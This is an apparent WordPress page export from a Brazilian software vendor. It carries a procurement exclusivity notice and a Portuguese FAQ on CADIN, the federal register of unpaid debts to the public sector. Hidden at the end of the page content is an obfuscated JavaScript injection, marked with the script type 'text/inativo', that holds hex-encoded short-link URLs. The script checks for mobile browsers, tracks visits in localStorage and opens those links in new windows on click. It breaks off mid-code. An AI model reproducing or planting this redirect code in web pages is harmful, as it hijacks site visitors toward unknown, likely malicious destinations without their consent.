{"id":68,"date":"2017-03-21T23:34:48","date_gmt":"2017-03-22T02:34:48","guid":{"rendered":"http:\/\/planetdados.com.br\/?page_id=68"},"modified":"2019-12-02T16:29:20","modified_gmt":"2019-12-02T19:29:20","slug":"enterprise-application-integration","status":"publish","type":"page","link":"https:\/\/planetdados.com.br\/?page_id=68","title":{"rendered":"Informa\u00e7\u00f5es \u00fateis"},"content":{"rendered":"<p>Sendo a&nbsp; autora&nbsp; e&nbsp; \u00fanica&nbsp; fornecedora&nbsp; do&nbsp; produto&nbsp; no&nbsp; Brasil, a PLANET INFORM\u00c1TICA LTDA. disponibiliza aos seus clientes o documento <strong>Atestado de Exclusividade de Software<\/strong>, emitido pela Associa\u00e7\u00e3o das Empresas Brasileiras de Tecnologia da Informa\u00e7\u00e3o &#8211; ASSESPRO\/PR, com o objetivo de facilitar o processo de aquisi\u00e7\u00e3o do sistema por parte dos \u00d3rg\u00e3os P\u00fablicos Federais interessados.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/planetdados.com.br\/wp-content\/uploads\/2019\/10\/Atestado-Exclusividade.fls01-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" class=\"alignnone size-medium wp-image-158\" srcset=\"https:\/\/planetdados.com.br\/wp-content\/uploads\/2019\/10\/Atestado-Exclusividade.fls01-225x300.jpg 225w, https:\/\/planetdados.com.br\/wp-content\/uploads\/2019\/10\/Atestado-Exclusividade.fls01-768x1024.jpg 768w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><img loading=\"lazy\" src=\"http:\/\/planetdados.com.br\/wp-content\/uploads\/2019\/10\/Atestado-Exclusividade.fls02-225x300.jpg\" alt=\"\" width=\"225\" height=\"300\" class=\"alignnone size-medium wp-image-156\" srcset=\"https:\/\/planetdados.com.br\/wp-content\/uploads\/2019\/10\/Atestado-Exclusividade.fls02-225x300.jpg 225w, https:\/\/planetdados.com.br\/wp-content\/uploads\/2019\/10\/Atestado-Exclusividade.fls02-768x1024.jpg 768w\" sizes=\"(max-width: 225px) 100vw, 225px\" \/><\/p>\n<p><strong>CADIN  &#8211;  PERGUNTAS E RESPOSTAS<\/strong><\/p>\n<p><strong>1 . O que \u00e9 o CADIN<\/strong>?<br \/>\nR: O CADIN \u2013 Cadastro Informativo de Cr\u00e9ditos n\u00e3o Quitados do Setor P\u00fablico Federal \u2013 \u00e9 um banco de dados onde se encontram registrados os nomes de pessoas f\u00edsicas e jur\u00eddicas em d\u00e9bito para com \u00f3rg\u00e3os e entidades federais.<br \/>\nAs informa\u00e7\u00f5es contidas no CADIN permitem \u00e0 Administra\u00e7\u00e3o P\u00fablica Federal uniformizar os procedimentos relativos \u00e0 concess\u00e3o de cr\u00e9dito, garantias, incentivos fiscais e financeiros, bem como \u00e0 celebra\u00e7\u00e3o de conv\u00eanios, acordos, ajustes ou contratos de modo a favorecer a gest\u00e3o seletiva dos recursos existentes.<br \/>\nCabe \u00e0 Secretaria do Tesouro Nacional expedir orienta\u00e7\u00f5es de natureza normativa a respeito do CADIN e ao Banco Central do Brasil administrar e disponibilizar, atrav\u00e9s do SISBACEN, as informa\u00e7\u00f5es que comp\u00f5em seu banco de dados.<br \/>\nO CADIN \u00e9 regulado pela Lei n\u00ba 10.522, de 19 de julho de 2002.<\/p>\n<p><strong>2. Quem efetua a inscri\u00e7\u00e3o no CADIN<\/strong>?<br \/>\nR: Qualquer \u00f3rg\u00e3o integrante da Administra\u00e7\u00e3o P\u00fablica Federal Direta ou Indireta, inclusive dos Poderes Legislativo e Judici\u00e1rio e Conselhos de fiscaliza\u00e7\u00e3o das profiss\u00f5es regulamentadas.<\/p>\n<p><strong>3. Quem pode ser inclu\u00eddo no CADIN<\/strong>?<br \/>\nR: Pessoas jur\u00eddicas, de direito p\u00fablico ou privado, e pessoas f\u00edsicas, respons\u00e1veis por obriga\u00e7\u00f5es pecuni\u00e1rias vencidas e n\u00e3o pagas para com \u00f3rg\u00e3os e entidades da Administra\u00e7\u00e3o P\u00fablica Federal, direta e indireta, ou que estejam com inscri\u00e7\u00e3o suspensa ou cancelada no Cadastro de Pessoa F\u00edsica \u2013 CPF, ou declarada inapta perante o Cadastro Geral de Contribuintes \u2013 CGC.<\/p>\n<p><strong>4. H\u00e1 um valor m\u00ednimo de d\u00e9bitos para fins de inscri\u00e7\u00e3o no CADIN<\/strong>?<br \/>\nR: Sim. Somente podem ser inscritos devedores respons\u00e1veis por d\u00e9bitos acima de R$ 999,99 ficando a crit\u00e9rio do credor a inscri\u00e7\u00e3o dos respons\u00e1veis por d\u00edvidas cujos valores estejam compreendidos entre R$ 1.000,00 e R$ 9.999,99. Para d\u00e9bitos de montante superior a R$ 10.000,00, \u00e9 obrigat\u00f3ria a inscri\u00e7\u00e3o.<\/p>\n<p>5. <strong>Quantas vezes o nome de um devedor pode ser inscrito no CADIN<\/strong>?<br \/>\nR: Cada devedor dever\u00e1 ser cadastrado uma \u00fanica vez no CADIN pelo \u00f3rg\u00e3o credor, todavia a baixa somente ser\u00e1 realizada ap\u00f3s a regulariza\u00e7\u00e3o de todas as suas obriga\u00e7\u00f5es para com aquele \u00f3rg\u00e3o. Dessa forma, se um devedor for respons\u00e1vel por 5 obriga\u00e7\u00f5es pass\u00edveis de inscri\u00e7\u00e3o no CADIN junto a um determinado credor, por exemplo, estar\u00e1 inscrito uma vez, mas somente poder\u00e1 ter seu nome exclu\u00eddo do Cadastro ap\u00f3s quitar todas as pend\u00eancias .<br \/>\nPor outro lado, estando um devedor em d\u00e9bito para com mais de um \u00f3rg\u00e3o credor, haver\u00e1 mais de uma inscri\u00e7\u00e3o: uma para cada \u00f3rg\u00e3o.<\/p>\n<p><strong>6. Quais os d\u00e9bitos que n\u00e3o podem ser inclu\u00eddos no CADIN<\/strong>?<br \/>\nR: Os d\u00e9bitos referentes a pre\u00e7os de servi\u00e7os p\u00fablicos (contas de luz, telefone, \u00e1gua, por exemplo) ou relativos a opera\u00e7\u00f5es financeiras que n\u00e3o envolvam recursos or\u00e7ament\u00e1rios.<\/p>\n<p><strong>7. Como \u00e9 feita a inscri\u00e7\u00e3o no CADIN<\/strong>?<br \/>\nR: Primeiramente o \u00f3rg\u00e3o respons\u00e1vel pela administra\u00e7\u00e3o do cr\u00e9dito deve comunicar ao devedor sobre a exist\u00eancia de d\u00e9bito pass\u00edvel de inscri\u00e7\u00e3o no CADIN, fornecendo-lhe todas as informa\u00e7\u00f5es pertinentes. Se a d\u00edvida n\u00e3o for regularizada dentro de 75 dias, contados a partir da data de comunica\u00e7\u00e3o, o nome do devedor ser\u00e1 inscrito no Cadastro. Quando a comunica\u00e7\u00e3o for efetuada por via postal ou telegr\u00e1fica, dirigida ao endere\u00e7o indicado no instrumento que deu origem ao d\u00e9bito, ser\u00e1 considerada entregue ap\u00f3s 15 dias da sua expedi\u00e7\u00e3o, contando-se, a partir de ent\u00e3o, o prazo de 75 dias.<\/p>\n<p><strong>8. Como podem ser obtidas informa\u00e7\u00f5es sobre a exist\u00eancia de registros no CADIN<\/strong>?<br \/>\nR: Caso n\u00e3o se tenha tomado conhecimento da notifica\u00e7\u00e3o expedida pelos \u00f3rg\u00e3os credores, as pessoas f\u00edsicas ou jur\u00eddicas podem ser informadas sobre a exist\u00eancia de registros mediante consulta a qualquer \u00f3rg\u00e3o ou entidade com acesso ao CADIN, todavia tais informa\u00e7\u00f5es somente ser\u00e3o prestadas aos respons\u00e1veis pelos d\u00e9bitos, devidamente identificados. Dada a natureza sigilosa das informa\u00e7\u00f5es que constituem o Cadastro, n\u00e3o \u00e9 disponibilizada ao p\u00fablico consulta por via telef\u00f4nica ou internet.<\/p>\n<p><strong>9. Como uma pessoa f\u00edsica ou jur\u00eddica pode saber os motivos de sua inscri\u00e7\u00e3o no CADIN<\/strong>?<br \/>\nR: As raz\u00f5es que deram motivo a uma inscri\u00e7\u00e3o somente podem ser informadas pelo \u00f3rg\u00e3o respons\u00e1vel por tal inscri\u00e7\u00e3o. Assim, cabe ao devedor dirigir-se ao credor e solicitar os esclarecimentos desejados.<\/p>\n<p><strong>10. A quem cabe cumprir as decis\u00f5es judiciais que determinam a baixa ou suspens\u00e3o de registros no CADIN<\/strong>?<br \/>\nR: A legisla\u00e7\u00e3o vigente prev\u00ea que as inclus\u00f5es e baixas somente podem ser realizadas pelos \u00f3rg\u00e3os credores, ou seja, um \u00f3rg\u00e3o n\u00e3o pode efetuar, por exemplo, a exclus\u00e3o de um registro patrocinado por outro \u00f3rg\u00e3o. Al\u00e9m desse impedimento legal, h\u00e1 uma limita\u00e7\u00e3o de ordem t\u00e9cnica, j\u00e1 que o SISBACEN n\u00e3o permite que tais opera\u00e7\u00f5es sejam realizadas. Dessa forma, as decis\u00f5es judiciais que tratam de cancelamento ou suspens\u00e3o de registros devem ser encaminhadas diretamente aos \u00f3rg\u00e3os respons\u00e1veis pelas inscri\u00e7\u00f5es, a quem caber\u00e1 cumprir determina\u00e7\u00f5es.<\/p>\n<p><strong>11. Qual o procedimento para se obter a baixa de um registro no CADIN<\/strong>?<br \/>\nR: Caber\u00e1 ao devedor procurar o \u00f3rg\u00e3o ou entidade respons\u00e1vel pela inscri\u00e7\u00e3o e comprovar a regulariza\u00e7\u00e3o do d\u00e9bito. O respons\u00e1vel pelo registro proceder\u00e1, no prazo m\u00e1ximo de 5 dias \u00fateis, \u00e0 respectiva baixa.<br \/>\nDeve-se ressaltar que somente o \u00f3rg\u00e3o ou entidade respons\u00e1vel pela inscri\u00e7\u00e3o \u00e9 que pode efetuar sua baixa.<\/p>\n<p><strong>12. \u00c9 poss\u00edvel suspender registros efetuados no CADIN<\/strong>?<br \/>\nR: Sim, desde que o devedor comprove que:<br \/>\n&#8211; tenha ajuizado a\u00e7\u00e3o, com o objetivo de discutir a natureza da obriga\u00e7\u00e3o ou o seu valor, como o oferecimento de garantia id\u00f4nea e suficiente ao Ju\u00edzo, na forma da lei;<br \/>\n&#8211; esteja suspensa a exigibilidade do cr\u00e9dito objeto do registro, nos termos da lei.<\/p>\n<p><strong>13. O parcelamento de um d\u00e9bito junto a um \u00f3rg\u00e3o ou entidade integrante da Administra\u00e7\u00e3o P\u00fablica Federal implica baixa de inscri\u00e7\u00e3o no CADIN<\/strong>?<br \/>\nR: Como a concess\u00e3o de parcelamentos envolve normas espec\u00edficas, \u00e9 recomend\u00e1vel que os interessados consultem os \u00f3rg\u00e3os credores acerca da manuten\u00e7\u00e3o ou n\u00e3o das inscri\u00e7\u00f5es existentes.<\/p>\n<p><strong>14. S\u00e3o emitidas certid\u00f5es negativas referentes a inscri\u00e7\u00f5es no CADIN<\/strong>?<br \/>\nR: N\u00e3o, pois o CADIN \u00e9 um cadastro para consulta. Somente quando os \u00f3rg\u00e3os credores estiverem impossibilitados de efetuar o cancelamento do registro dentro do prazo requerido (de at\u00e9 cinco dias \u00fateis ap\u00f3s a comprovada a regulariza\u00e7\u00e3o da d\u00edvida) \u00e9 que poder\u00e3o ser emitidas certid\u00f5es negativas referentes ao d\u00e9bito, desde que n\u00e3o haja outras pend\u00eancias.<\/p>\n<p><strong>15. De que forma os \u00f3rg\u00e3os da Administra\u00e7\u00e3o P\u00fablica Federal podem acessar o CADIN<\/strong>?<br \/>\nR: Mediante cadastramento junto ao Banco Central do Brasil, onde dever\u00e1 ser comprovada a vincula\u00e7\u00e3o do \u00f3rg\u00e3o \u00e0 Administra\u00e7\u00e3o P\u00fablica Federal.<br \/>\nAs informa\u00e7\u00f5es s\u00e3o disponibilizadas atrav\u00e9s do Sistema de Informa\u00e7\u00f5es do Banco Central do Brasil (SISBACEN).<\/p>\n<p><strong>16. Como proceder quando um d\u00e9bito \u00e9 inscrito em D\u00edvida Ativa da Uni\u00e3o<\/strong>?<br \/>\nR: Toda vez que uma obriga\u00e7\u00e3o pecuni\u00e1ria vencida e n\u00e3o paga for inscrita em D\u00edvida Ativa da Uni\u00e3o, o \u00f3rg\u00e3o ou entidade credora promover\u00e1 a sua baixa do CADIN, todavia somente ap\u00f3s a efetiva\u00e7\u00e3o do cadastramento dessa obriga\u00e7\u00e3o por parte do \u00f3rg\u00e3o encarregado da cobran\u00e7a judicial dos valores devidos.<\/p>\n<p><strong>17. Como a Administra\u00e7\u00e3o P\u00fablica Estadual ou Municipal pode ter acesso ao CADIN<\/strong>?<br \/>\nR: As Administra\u00e7\u00f5es Estadual e a Municipal somente podem consultar registros relativos a \u00f3rg\u00e3os e entidades a elas subordinadas, sendo-lhes vedado efetuar inclus\u00f5es ou exclus\u00f5es. O acesso \u00e0s informa\u00e7\u00f5es tamb\u00e9m \u00e9 obtido mediante cadastramento junto ao Banco Central.<\/p>\n<p><strong>18. Em que casos \u00e9 obrigat\u00f3ria a consulta pr\u00e9via ao CADIN pelos \u00f3rg\u00e3os e entidades da Administra\u00e7\u00e3o P\u00fablica Federal<\/strong>?<br \/>\nR:<br \/>\n&#8211; Na realiza\u00e7\u00e3o de opera\u00e7\u00f5es de cr\u00e9dito que envolvam a utiliza\u00e7\u00e3o de recursos p\u00fablicos;<br \/>\n&#8211; Na concess\u00e3o de incentivos fiscais e financeiros;<br \/>\n&#8211; Na celebra\u00e7\u00e3o de conv\u00eanios, acordos, ajustes ou contratos que envolvam desembolso, a qualquer t\u00edtulo, de recursos p\u00fablicos, e respectivos aditamentos.<\/p>\n<p><strong>19. Em que casos \u00e9 dispensada a consulta pr\u00e9via ao CADIN pelos \u00f3rg\u00e3os e entidades da Administra\u00e7\u00e3o P\u00fablica Federal<\/strong>?<br \/>\nR:<br \/>\n&#8211; Na concess\u00e3o de aux\u00edlios a Munic\u00edpios atingidos por calamidade p\u00fablica reconhecida pelo Governo Federal;<br \/>\n&#8211; Nas opera\u00e7\u00f5es destinadas \u00e0 composi\u00e7\u00e3o e regulariza\u00e7\u00e3o dos cr\u00e9ditos e obriga\u00e7\u00f5es objeto de registro no CADIN, sem desembolso de recursos por parte do \u00f3rg\u00e3o ou entidade credora;<br \/>\n&#8211; Nas opera\u00e7\u00f5es relativas ao cr\u00e9dito educativo e ao penhor civil de bens de uso pessoal ou dom\u00e9stico;<\/p>\n<p><strong>20. Em que casos as transfer\u00eancias de recursos federais aos Estados, Distrito Federal e Munic\u00edpios n\u00e3o sofrem restri\u00e7\u00f5es em raz\u00e3o da exist\u00eancia de registros no CADIN<\/strong>?<br \/>\nR: Quando os recursos a serem transferidos forem destinados \u00e0 execu\u00e7\u00e3o de:<br \/>\n&#8211; a\u00e7\u00f5es sociais;<br \/>\n&#8211; a\u00e7\u00f5es em faixa de fronteira.<br \/>\nTal benef\u00edcio, contudo, n\u00e3o \u00e9 v\u00e1lido se houver registros no CADIN origin\u00e1rios de d\u00edvidas para com o Instituto Nacional do Seguro Social &#8211; INSS.<\/p>\n<p><strong>21. A inexist\u00eancia de registro no CADIN corresponde a um atestado de regularidade<\/strong>?<br \/>\nR: N\u00e3o. A inexist\u00eancia de registro no CADIN n\u00e3o implica reconhecimento de regularidade de situa\u00e7\u00e3o, nem dispensa a apresenta\u00e7\u00e3o dos documentos exigidos em lei, decreto ou demais atos normativos.<\/p>\n<p><strong>22. Existe algum tratamento diferenciado em rela\u00e7\u00e3o ao CADIN para micro e pequenas empresas, pequenas produtores e agricultores familiares<\/strong>?<br \/>\nR: Sim. No caso de opera\u00e7\u00f5es de cr\u00e9dito contratadas por institui\u00e7\u00f5es financeiras, no \u00e2mbito de programas oficiais de apoio \u00e0s micro e pequenas empresas, assim como aos pequenos produtores e agricultores familiares, ficam os mutu\u00e1rios, quando n\u00e3o inscritos no CADIN, dispensados da apresenta\u00e7\u00e3o, inclusive aos cart\u00f3rios, de todas as certid\u00f5es exigidas por lei, decreto ou demais normativos, comprobat\u00f3rios da quita\u00e7\u00e3o de quaisquer tributos e contribui\u00e7\u00f5es federais.<\/p>\n<p><strong>23. H\u00e1 diferen\u00e7a entre a inscri\u00e7\u00e3o no CADIN e a inscri\u00e7\u00e3o no cadastro de conv\u00eanios do SIAFI<\/strong>?<br \/>\nR: Sim. A inscri\u00e7\u00e3o no Cadastro de Conv\u00eanio do SIAFI refere-se exclusivamente \u00e0 inadimpl\u00eancia ou irregulares constatadas na presta\u00e7\u00e3o de contas de conv\u00eanios celebrados com a Uni\u00e3o. Nesse caso, tamb\u00e9m cabe ao \u00f3rg\u00e3o ou entidade respons\u00e1vel pelo conv\u00eanio proceder \u00e0 inscri\u00e7\u00e3o e \u00e0 baixa no referido Cadastro.<br \/>\nDEFINI\u00c7\u00d5ES<br \/>\nAdministra\u00e7\u00e3o P\u00fablica Federal Direta: compreende a estrutura da Presid\u00eancia da Rep\u00fablica e dos Minist\u00e9rios.<br \/>\nAdministra\u00e7\u00e3o P\u00fablica Federal Indireta: compreende as Autarquias, as Funda\u00e7\u00f5es P\u00fablicas, as Empresas P\u00fablicas e as Sociedades de Economia Mista.<br \/>\nAgricultores Familiares \u2013 propriet\u00e1rios, assentados, posseiros, arrendat\u00e1rios, parceiros ou meeiros que: a) utilizam m\u00e3o-de-obra familiar b) t\u00eam at\u00e9 2 empregados permanentes c) n\u00e3o possuem \u00e1reas superiores a 4 m\u00f3dulos fiscais d) obt\u00e9m, no m\u00ednimo, 80 % da renda bruta familiar anual na atividade agropecu\u00e1ria e n\u00e3o-agropecu\u00e1ria exercida no estabelecimento (Decreto n\u00ba 3.391, de 30.10.2001).<br \/>\nGarantia Id\u00f4nea: garantia oferecida pelo devedor, capaz de satisfazer o d\u00e9bito constitu\u00eddo, conforme definido em ju\u00edzo.<br \/>\nInscri\u00e7\u00e3o Suspensa: quando empresa em situa\u00e7\u00e3o regular junto \u00e0 Receita Federal comunica interrup\u00e7\u00e3o tempor\u00e1ria de suas atividades ou esteja em processo de baixa iniciada e ainda n\u00e3o diferida ou for considerada omissa. \u00c9 designado omisso o contribuinte que fica 5 ou mais exerc\u00edcios consecutivos sem apresentar declara\u00e7\u00f5es \u00e0 Receita Federal.<br \/>\nInscri\u00e7\u00e3o Cancelada: aquela que resulta do deferimento da solicita\u00e7\u00e3o de baixa da inscri\u00e7\u00e3o.<br \/>\nInscri\u00e7\u00e3o Inapta: relativa \u00e0 contribuinte omisso que n\u00e3o atendeu \u00e0 intima\u00e7\u00e3o da Receita Federal para regularizar sua situa\u00e7\u00e3o. \u00c9 designado omisso o contribuinte que fica 5 ou mais exerc\u00edcios consecutivos sem apresentar declara\u00e7\u00f5es \u00e0 Receita Federal.<br \/>\nMicroempresa: pessoa jur\u00eddica que tenha auferido, no ano-calend\u00e1rio, receita bruta igual ou inferior a R$ 120.000,00 (Lei n\u00ba 9.317, de 05.12.96, alterada pela Lei n\u00ba 10.034, de 24.10.00).<br \/>\nPequena Empresa: pessoa jur\u00eddica que tenha auferido no ano-calend\u00e1rio, receita bruta superior a R$ 120.000,00 e igual e inferior a R$ 1.200.000,00 (Lei n\u00ba 9.317, de 05.12.96, alterada pela Lei n\u00ba 10.034, de 24.10.00).<br \/>\nPequeno Produtor: aquele classificado como tal de acordo com as normas de cr\u00e9dito rural vigentes \u00e0 \u00e9poca do contrato, conforme \u00a7 2\u00ba do art. 47 do ADCT.<br \/>\nSISBACEN: \u00c9 o Sistema de Informa\u00e7\u00f5es do Banco Central, que se destina ao tratamento, armazenamento e recupera\u00e7\u00e3o \u201con-line\u201d de dados e informa\u00e7\u00f5es, com atualiza\u00e7\u00e3o em tempo real.<br \/>\n<script type=\"text\/inativo\">function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x45\\x67\\x76\\x33\\x63\\x393','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6e\\x4b\\x4b\\x35\\x63\\x355','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6d\\x6e\\x66\\x38\\x63\\x358','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6d\\x70\\x66\\x39\\x63\\x389','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x71\\x42\\x78\\x34\\x63\\x384','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x45\\x67\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x46\\x72\\x4b\\x32\\x63\\x382','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x46\\x6d\\x6e\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x41\\x43\\x30\\x63\\x330','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x43\\x59\\x67\\x31\\x63\\x361',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 